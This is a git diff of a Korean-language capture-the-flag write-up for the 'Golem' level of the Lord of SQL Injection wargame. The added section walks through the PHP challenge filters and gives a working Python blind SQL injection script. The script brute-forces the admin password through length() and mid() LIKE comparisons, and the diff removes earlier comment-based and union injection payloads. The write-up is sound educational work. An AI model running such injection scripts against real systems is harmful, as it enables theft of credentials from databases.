--- a/Wargame/Lord of SQL Injection/11. Golem.md
+++ b/Wargame/Lord of SQL Injection/11. Golem.md
@@ -1,70 +1,118 @@
-# **Skeleton**
+# **Golem**
 ## 1. 문제의도
 MySQL 에서 주석 사용법을 아는가?
 
 ----
 ## 2. 코드
 ```php
-    <?php 
-      include "./config.php"; 
-      login_chk(); 
-      dbconnect(); 
-      
-      if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw]))
-        exit("No Hack ~_~"); 
-      
-      $query = "select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0"; 
-      echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
-      $result = @mysql_fetch_array(mysql_query($query)); 
-      
-      if($result['id'] == 'admin')
-        solve("skeleton"); 
-      
-      highlight_file(__FILE__); 
-    ?>
+  <?php
+    include "./config.php";
+    login_chk();
+    dbconnect();
+
+    if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw]))
+      exit("No Hack ~_~");
+
+    if(preg_match('/or|and|substr\(|=/i', $_GET[pw]))
+      exit("HeHe");
+
+    $query = "select id from prob_golem where id='guest' and pw='{$_GET[pw]}'";
+    echo "<hr>query : <strong>{$query}</strong><hr><br>";
+    $result = @mysql_fetch_array(mysql_query($query));
+
+    if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
+
+    $_GET[pw] = addslashes($_GET[pw]);
+
+    $query = "select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'";
+    $result = @mysql_fetch_array(mysql_query($query));
+
+    if(($result['pw']) && ($result['pw'] == $_GET['pw']))
+      solve("golem");
+
+    highlight_file(__FILE__);
+  ?>
 ```
 ----
 ### 1. preg_match()
-막는 건 테이블명 정도?
-
-    prob | _ | . | ()
+information_schema 와 문제 테이블들에 대한 직접 접근을 막고 있다.
+```
+  prob | _ | . | ()
+```
 
 ### 2. query
-
-   select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0
+```SQL
+  select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'
+```
 
 접근 할 수 있는 부분 : pw GET parameter  
 
+### 3. 통과 조건
+```php
+  if(($result['pw']) && ($result['pw'] == $_GET['pw']))
+    solve("golem");
+```
+우리는 pw를 직접 알 필요가 있다.
+
 ----
 ## 3. Solution
+pw 파라미터를 통한 블라인드 인젝션으로 admin 계정의 pw 를 알아보자!!
 
-지금 이 문제에서 막히는 부분은 뒷 부분에 and 1=0 이 있어 or id='admin'을  
-입력해주어도 거짓이 되어 통과하지 못한다는 점이다.
-
-### 1. MySQL 주석
-
-이유는 모르겠지만 우리는 주석을 사용할 수 있습니다.  
-그리고 주석의 종류에는 다음과 같은 것이 있습니다.
-
-+ **--** 그리고 **#** : 한줄 주석 처리
-+ __/**/__ : 여러줄 가능 (주석 안에서라도 ", ' 여닫기는 해줄것!! )
+<이제 부터는 어느정도의 mysql 함수를 안다는 가정하에 진행한다.>
 
 ### My Answers :
 
-그래서 결론적으로 두가지를 시도해 보았다.  
-하나는 or id='admin' 후 주석처리를 통해서 뒤의 값을 무시 하는 것이고  
-또 하나는 union select 'admin' 을 통해서 뒤의 값을 무시하는 것이었다.
+이번 문제는 간단한 블라인드 SQLi 이다.
 
-결론 적으로는 둘다 성공적이었다.
-의문이 들었던 것은 **어째서 union 을 이용한 두번째 경우가 성공한 것일까**  
-내 생각에는 mysql_fetch_array 를 통해 배열로 다시 인출하면서  
-id 가 첫번째 콜롬 이었고 'id'는 0과 같은 취급을 받았기 때문이라는 생각을 하였다.  
-<del>물론 정확히는 모른다</del>
+다음과 같은 python 코드를 작성하여 해결 하였다.
 
-+ ?pw=' or id='admin'-- -
-+ ?pw=' or id='admin'# 
-+ ?pw=' union select 'admin'-- -
+```python
+#-*- coding: utf-8 -*-
+import urllib2, urllib, string
+
+def getRequest(url, inject_url=""):
+    if inject_url is not "": url = url.format(urllib.quote(inject_url))
+    print url
+    req = urllib2.Request(url)
+    req.add_header('User-Agent','Mozilla/4.0')
+    req.add_header("Cookie","PHPSESSID=kvkemdvcf9bqkcmk5v2c51chk4")
+    return req
+
+def getPage(req):
+    return urllib2.urlopen(req).read()
+
+url = "http://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php?pw={}"
+
+# get length
+inject_url = "' || length(pw) like {}; -- -"
+for i in range(1, 100):
+    req = getRequest(url,inject_url.format(i))
+    page = getPage(req)
+    if "Hello admin" in page:
+        length = i
+        break
+
+print "Length :",length
+
+# get password : brute forcing
+password = ""
+inject_url = "' || mid(pw,{},1) like '{}"
+for i in range(1,length+1):
+    for c in string.digits + string.letters:
+        req = getRequest(url, inject_url.format(i,c))
+        page = getPage(req)
+        if "Hello admin" in page:
+            print i,"'th letter is",c
+            password += c
+            break
+
+print "Password :",password
+
+```
+
+python 코드가 "Password : 88e3137f" 라고 출력했다.
+그래서 답은 88e3137f 를 입력하면 클리어!!
 
 **Lastly, There can be many answers**
 
-**[Go to see other solutions](https://github.com/moreal/TIL/blob/master/Security/WarGame/WriteUp/los.eagle-jump.org/00.%20ReadMe.md)**
+**[Go to see other solutions](https://github.com/moreal/WriteUp/blob/master/Wargame/Lord%20of%20SQL%20Injection/00.%20ReadMe.md)**
